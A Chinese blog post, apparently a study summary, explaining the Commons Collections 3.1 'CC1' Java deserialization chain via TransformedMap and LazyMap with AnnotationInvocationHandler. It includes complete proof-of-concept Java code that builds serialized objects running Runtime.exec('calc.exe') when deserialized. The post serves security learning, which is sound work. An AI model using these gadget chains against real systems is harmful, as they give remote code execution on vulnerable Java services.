CC1 学习总结

已于 2022-06-15 16:32:41 修改
阅读量524 收藏
点赞数 1
分类专栏: java学习 代码审计 文章标签: 学习
于 2022-06-01 19:01:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AsagiRiAsagi/article/details/125088631
版权

TransformedMap链流程

在知识星球看到有师傅用思维导图的方式描述cc链,在这里借鉴一下,自己画一遍CC1 TransformedMap这条链子的流程

组合技

p牛在安全漫谈里上来就在介绍这套组合技,我把它叫做有着固定范式的combo,也就是上图蓝色框起来的部分。

蓝色的combo部分是不依赖于反序列化存在的,以下是p牛简化过的poc,我加了一些批注

public class CC1combo {
  public static void main(String[] args) throws Exception {
    Transformer[] transformers =
        new Transformer[] {
          new ConstantTransformer(Runtime.getRuntime()),
          new InvokerTransformer("exec", new Class[] {String.class}, new Object[] {"calc.exe"}),
        };
    //构造ChainedTransformer,这个过程像是多米诺骨牌,一环紧扣一环
    Transformer transformerChain = new ChainedTransformer(transformers);
    Map innerMap = new HashMap();
    Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
    
    //手动添加元素,触发TransformedMap.checkSetValue(),以触发combo部分
    outerMap.put("hello", "xxxx");
  }
}
重要的Transformer
Transformer类作用
ConstantTransformer用于包装任意一个对象,调用transform方法返回被包装的对象
InvokerTransformer用于执行任意方法
调用transform方法通过反射调用参数中指定的方法以及形参
ChainedTransformer把多个Transformer串起来,前一个回调的结果作为后一个回调的参数传入

TransformedMap在这里的作用是为了触发ChainedTransformer的回调,让整个combo机制能够连环运作。

这里是有疑问的,因为这是一种从结果倒推的方法,我不确定TransformedMap本身是否属于combo机制的一部分,但无论如何都运作的十分巧妙。

满足组合技的条件

TransformedMap触发回调需要往Map中添入新元素,这是机制的一部分。我们能控制的输入只有反序列化的内容,也就是说需要挑选合适的类,在其反序列化时执行一些类似往Map中添入元素的操作。

这个类就是AnnotationInvocationHandler,它有一个成员变量memberValuesMap类型,readObject()函数中对memberValues的每一项调用了setValue()函数(这个问题在8u71被修复了)。这意味着如果这个memberValues是我们精心设计的TransformedMap,就能够触发其回调函数进而运行combo

构造payload

构造payload时会遇到一些问题:

Runtime对象无法序列化

Runtime类没有实现java.io.serializable接口,尝试通过反射获取当前上下文的Runtime对象。

AnnotationInvocationHandler.readObject()无法触发漏洞

p牛在java漫谈中直接给出了两个条件:

  1. sun.reflect.annotation.AnnotationInvocationHandler构造函数的第一个参数必须是Annotation的子类,且其中必须含有至少一个方法,假设方法名为X
  2. TransformedMap.decorate修饰的Map中必须有一个键名为X的元素

p牛在此用到了Retention.class,其有一个方法名为value。这里p牛给出的条件不够严谨,原因出在下述代码第二次做if判断的位置

//jdk8u71之前
//sun.reflect.annotation.AnnotationInvocationHandler
//#readObject
if (var7 != null) {
      Object var8 = var5.getValue();
      if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
        var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + 	"]")).setMember((Method)var2.members().get(var6)));
      }
}

我们给map添加新元素时,新元素的key对应的方法返回类型不能与value的类型相同,也不是 ExceptionProxy 对象。比如说我在这里使用了Generated.class中的comments方法,该方法返回的类型是String,那么添加新元素时我应该写成map.put("comments",0)

最终构造可利用的payload

public static void main(String[] args) throws Exception {
      Transformer[] transformers =
          new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer(
                "getMethod",
                new Class[] {String.class, Class[].class},
                new Object[] {"getRuntime", new Class[0]}),
            new InvokerTransformer(
                "invoke",
                new Class[] {Object.class, Object[].class},
                new Object[] {null, new Object[0]}),
            new InvokerTransformer("exec", new Class[] {String.class}, new Object[] {"calc.exe"}),
          };

      Transformer transformerChain = new ChainedTransformer(transformers);

      Map innerMap = new HashMap();

      innerMap.put("comments", 0);
      Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);

      Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
      Constructor constructor = clazz.getDeclaredConstructor(Class.class, Map.class);
      constructor.setAccessible(true);
      Object obj = constructor.newInstance(Generated.class, outerMap);

      ByteArrayOutputStream barr = new ByteArrayOutputStream();
      ObjectOutputStream oos = new ObjectOutputStream(barr);
      oos.writeObject(obj);
      oos.close();
      System.out.println(barr);
      ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
      Object o = (Object) ois.readObject();
    }
}

LazyMap链流程

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EeSnhmEg-1655281943867)(https://raw.githubusercontent.com/DrDenkiBran/Image/main/img/image-20220604201652339.png)]

LazyMap

与TransformedMap类似,来源于Common-Collections库,继承AbstractMapDecorator

与TransformedMap这条利用链区别在于:LazyMap需要执行其get方法才能执行内部的factory.transform回调,触发后续ChainedTransformer的链式调用。

动态代理

AnnotationInvocationHandler.invoke中调用了get方法
image-20220604203244196

如何调用invoke方法?ysoserial给出的答案是动态代理类Proxy

简单讲,代理类可以在运行时创建全新的类,这样能够实现指定的接口,它将会包含指定接口所需要的全部方法。

但是不能在运行时定义这些方法的新代码,而是需要提供一个调用处理器handler,它是实现了InvocationHandler接口的对象,这个接口只定义了一个invoke方法。

一旦调用代理对象的方法,都会调用对应handler的invoke方法

不难发现ysoserial给出的思路十分自然,因为AnnotationInvocationHandler是实现了InvocationHandler接口的类。在readObject时利用代理类调用任意方法都会调用对应handler的特性,调用AnnotationInvocationHandler.invoke

攻击构造

public static void main(String[] args) throws Exception {
    Transformer[] transformers =
        new Transformer[] {
          new ConstantTransformer(Runtime.class),
          new InvokerTransformer(
              "getMethod",
              new Class[] {String.class, Class[].class},
              new Object[] {"getRuntime", new Class[0]}),
          new InvokerTransformer(
              "invoke",
              new Class[] {Object.class, Object[].class},
              new Object[] {null, new Object[0]}),
          new InvokerTransformer("exec", new Class[] {String.class}, new Object[] {"calc.exe"}),
        };
    Transformer transformerChain = new ChainedTransformer(transformers);
    // 构造ChainedTransformer
    Map innerMap = new HashMap();

    Map outerMap = LazyMap.decorate(innerMap, transformerChain);

    Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor constructor = clazz.getDeclaredConstructor(Class.class, Map.class);
    constructor.setAccessible(true);
    InvocationHandler handler =
        (InvocationHandler) constructor.newInstance(Generated.class, outerMap);

    Map proxyMap =
        (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[] {Map.class}, handler);

    handler = (InvocationHandler) constructor.newInstance(Generated.class, proxyMap);
    //第一个参数满足构造器要求的条件即可
    //不需要像TransformedMap链中那样花式调用setValue,因为这之前代理的map对象就通过调用自己的方法调用到了invoke
    
    SerializeUtil.writeObject(handler);
    SerializeUtil.readObject();
    //简化反序列化的部分
 }

总结

值得关注和思考的点

  1. 入口点的作用:AnnotationInvocationHandler.readObject()
  2. ChainedTransformer的链式调用,这套组合拳或许后续还能用到。

依赖版本

commons-collections : 3.1
JDK < 8u71

要接地气
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[linux]LINUX程序设计cc1--入门
sinat_28128937的博客
06-07 2383
在学操作系统和网络时穿插着学过一点LINUX.今天开始系统的从头开始学习一下,教材是《Linxu程序设计》和《Unix环境高级编程》。 第一天: UNIX系统:一种遵循特定规范的计算机系统,定义了所有必需的系统函数的名称、接口、行为。 Linux:一个自由发布的类Unix内核实现,是一个操作系统的底层核心。 GNU的GPL:
CC框架学习总结-附件资源
03-05
CC框架学习总结-附件资源
cc1学习
lightsec
04-24 1849
前言: 本文主要记录学习cc1的过程,cc1是第一条也是最经典的一条利用链,后面几条利用链也是基本多多少少利用了这条链子,刚接触javacc链,过程中有错误理解不对的地方,欢迎师傅们指正 分析过程: 先简单提一下利用链是怎么形成的,也便我们好寻找 org.apache.commons.collections.functors Commons Collections 自定义的一组功能类 这组功能类里面有个 ConstantTransformer.java 是一个转换器,里面定义了一个 trans
java反序列之CC1
Go_change的博客
05-09 222
序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,就是将对象转换成另一种形式,以方便跨平台存储和网络传输。反序列化则是将上述过程反过来进行的操作。在Java中任何一个对象必须要实现Serializable接口才可以执行序列化和反序列化操作。
CC1链分析
sunyufei_666的博客
06-15 244
第一个是memberType类型不为空值,这里type是传入的Override.class,annotationType.memberTypes()为调用出入class的成员方法,所以,传入的class类中必须存在成员方法,且成员变量的key值必须与map中的key值相同,而Override.class的成员方法为空值,所以这里可以选择Target.class作为参数。这里有两个if,如果这两个if的条件为false时,无法调用里面的setValue方法。
java代码审计之CC1链(一)
st3pby的博客
02-20 3754
InvokerTransformerCC1链的漏洞点位于InvokerTransformer.class中反射加载参数可控那么只需要调用到这个点,就可以触发漏洞,可以参考ysoserial中的CC1利用ysoserial中的CC1链,是使用LazyMap构造的,LazyMap构造的整条攻击路径为。
programingBasic:CC ++原始学习总结
03-23
C / C ++源码学习总结 C语言(原始语言) 01-C语言初探 02-预算和数据类型 03-循环结构和选择结构 04-整数 05-基本数据类型 06-复杂类型 07-指针 08-函数 09-基本字符串 10-弦和指针 11-结构体 12-内存管理 14-共有...
cc1101中文学习资料,CC1101学习总结
10-10
这是我个人学习cc1101的一点心得总结,希望能够帮助到刚刚开始学的同学
实验1、CC2530 流水灯实验_cc2530_
10-02
学习流水灯的例程,仅供学习参考,欢迎大家学习
CC1利用链EXP编写之源码分析
yuan_boss的博客
08-14 198
经过查找,可以发现类的setValue()方法中调用了checkSetValue()方法,并且setValue()方法可以传入任意参数类型。
java反序列化CC1
qq_62540010的博客
03-16 397
Java Commons Collections的利用链也被称为cc链,是在学习反序列化漏洞必不可少的一个部分。首先先介绍一下Commons Collection组件,Apache Commons 当中有⼀个组件叫做 Apache Commons Collections ,主要封装了Java 的 Collection(集合) 相关类对象,它提供了很多强有⼒的数据结构类型并且实现了各种集合⼯ 具类。collection是set,list,queue的抽象。
CC1链分析与复现
weixin_42974824的博客
08-16 1426
CC1链分析与复现
Java反序列化之CC1链分析
热门推荐
混子
12-17 1万+
可能之前看Java CC1链的文章留下了有阴影把,有TransformedMap玩法,还有Lazymap玩法,最终还得借助AnnotationInvocationHandler或这动态代理,看着就头大,所以拖了一段时间,没办法,最终还是来了,洞一直在更新,我不加快节奏干洞,洞要给我说再见,这就很难受,不闹了,这篇文章主要是CC1链和那两种玩法
一文带你搞懂CC1链(小白入门必看文章)
最新发布
maple_leaf
12-03 1846
CC链是利用Java反序列化漏洞进行攻击的一种方式。CC链利用Apache Commons Collections库中的Transformer接口的实现类,通过巧妙的设计,将恶意代码序列化为一个对象,然后将该对象传递给一个反序列化函数,从而触发恶意代码的执行。
Java安全--CC1的补充和CC6
qq_64201116的博客
12-08 1152
我们看一下两条链子的分歧在哪里:从ChainedTransformer.transform()开始往下和上一次讲的链子是一样的,这里就不赘述了。不一样的是transformer调用的函数从TransformedMap.checkSetValue()变成了LazyMap.get()我们现在的目标是搜索那里调用了get方法-->也是AnnotationInvocationHandler需要利用的点在AnnotationInvocationHandler的invoke()里面,而学完动态代理我们知道Invocat
关于cc1/cc3 无法在高版本jdk中利用的说明
weixin_43263451的博客
07-26 493
在jdk8u71之后,调试invoke方法发现我们代理类AnnotationInvocationHandler中的this.memberValues被替换为了linkedhashmap,不是先前设置的lazymap,这就导致无法在78行调用lazymap.get。cc1和cc3本来是执行到readobject时利用动态代理触发代理类AnnotationInvocationHandler的invoke方法,从而调用AnnotationInvocationHandler中的lazymap.get方法。...
Java 反序列化漏洞-Apache Commons Collections1-TransformedMap 攻击链
cjdgg的博客
02-08 2456
Java 反序列化漏洞-Apache Commons Collections前言前置知识TransformedMap 前言 前面已经学了一些Java反序列化漏洞的相关基础知识,今天就来学习分析一下Apache Commons Collections的反序列化漏洞 环境搭建推荐大家直接使用maven搭建,网上都有很多教程这里就不多说了 要寻找反序列化漏洞,最主要的是找到三个点: 入口点(kick-off),触发点(sink),调用链(chain) 前置知识 TransformedMap org.apache.
.exp文件_UEditor编辑器任意文件上传漏洞分析
weixin_39939510的博客
11-27 240
更多全球网络安全资讯尽在邑安全ue下载地址http://http://ueditor.baidu.com/website/download.htmlexp<form action="http://192.168.1.103/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" m...
Apache commons-collections反序列化漏洞(TransformedMap利用链)
qq_43936524的博客
04-10 442
文章目录Commons-collections概述InvokerTransformer反射触发ChainedTransformer遍历触发封装为TransformedMap寻找ReadObject触发点AnnotationInvocationHandler触发(JDK1.7)BadAttributeValueExpException(JDK1.8) Commons-collections概述 官网对Commons-collections的说明 Java commons-collections是JDK 1.
cc3200-launchxl
07-28
CC3200-LAUNCHXL是一款基于CC3200芯片的开发板。为了使用CC3200-LAUNCHXL开发板,需要安装CCS Uniflash和CC3200SDK-SERVICEPACK。CC3200-LAUNCHXL开发板的驱动是FTDI驱动,如果已经安装了其他FTDI驱动,则不需要再次安装。如果没有安装FTDI驱动,可以在CCS Uniflash安装目录中找到该驱动。此外,还需要下载系统服务包,该文件通常位于CC3200SDK-SERVICEPACK文件夹中,文件名为servicepack_XXXX.bin,其中XXXX表示版本号。在CC3200中,数据的接收和发送都需要使用缓冲空间(FIFO),每个空间只能接收有限的数据。因此,需要开辟新的空间来存储采集到的数据,并通过串口中断将数据存储起来。随后,将数据打包成数据包,并通过TCP/IP通信协议进行数据交互。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* *2* [CC3200-LAUNCHXL开发板使用心得分享-MicroPython](https://blog.csdn.net/weixin_39983404/article/details/110056568)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CC3200学习总结](https://blog.csdn.net/qq_36481034/article/details/117266008)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值